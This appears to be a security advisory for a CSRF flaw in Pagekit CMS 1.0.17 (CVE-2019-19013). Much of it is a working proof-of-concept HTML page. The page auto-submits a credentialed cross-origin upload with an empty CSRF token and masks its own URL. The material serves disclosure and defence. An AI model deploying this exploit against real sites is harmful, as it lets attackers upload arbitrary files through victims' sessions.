Release Date: 2019-11-21
Updated: 2019-11-26
Affected Systems:
Pagekit Pagekit 1.0.17
Description:
CVE (CAN) ID: CVE-2019-19013
Pagekit is a modular, lightweight content management system.
Pagekit 1.0.17 has a CSRF vulnerability in its file upload implementation: the server does not reject an upload request whose CSRF token field (`_csrf`) has been removed or left empty. An attacker who lures an authenticated user to a malicious page can therefore forge a request to the finder upload endpoint and upload arbitrary files into the site's storage.
<* Source: Vendor *>
Test method:
WARNING
The following procedure (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk.
The vendor () provided the following test method:
<html>
<body>
<!-- Rewrite the visible URL to "/" so the attacker page's address is less conspicuous. -->
<script>history.pushState('', '', '/')</script>
<script>
function submitRequest()
{
// Cross-origin POST to the Pagekit finder upload endpoint. withCredentials makes the
// browser attach the victim's Pagekit session cookie, so the request is authenticated.
var xhr = new XMLHttpRequest();
xhr.open("POST", "http:\/\/localhost\/pagekit\/system\/finder\/upload", true);
xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=----WebKitFormBoundaryJze564AoGkbRRRUz");
xhr.setRequestHeader("Accept", "*\/*");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.9");
xhr.withCredentials = true;
// Hand-built multipart body: one file part (test.jpg, empty content), the target
// path and storage root, and an empty _csrf field, which the server fails to reject.
var body = "------WebKitFormBoundaryJze564AoGkbRRRUz\r\n" +
"Content-Disposition: form-data; name=\"files[]\"; filename=\"test.jpg\"\r\n" +
"Content-Type: image/jpeg\r\n" +
"\r\n" +
"\r\n" +
"------WebKitFormBoundaryJze564AoGkbRRRUz\r\n" +
"Content-Disposition: form-data; name=\"path\"\r\n" +
"\r\n" +
"/\r\n" +
"------WebKitFormBoundaryJze564AoGkbRRRUz\r\n" +
"Content-Disposition: form-data; name=\"root\"\r\n" +
"\r\n" +
"storage\r\n" +
"------WebKitFormBoundaryJze564AoGkbRRRUz\r\n" +
"Content-Disposition: form-data; name=\"_csrf\"\r\n" +
"\r\n" +
"\r\n" +
"------WebKitFormBoundaryJze564AoGkbRRRUz--\r\n";
// Send the body as raw bytes so the browser does not re-encode it or add its own boundary.
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
// Fire automatically on page load; the button below is a manual fallback.
submitRequest();
</script>
<form action="#">
<input type="button" value="Submit request" onclick="submitRequest();" />
</form>
</body>
</html>
Recommendation:
Vendor patch:
Pagekit
-------
At the time of writing the vendor has not provided a patch or upgrade. Users of this software are advised to monitor the vendor's home page for the latest version:
https://pagekit.com/
https://packetstormsecurity.com/files/155426/Pagekit-CMS-1.0.17-Cross-Site-Request-Forgery.html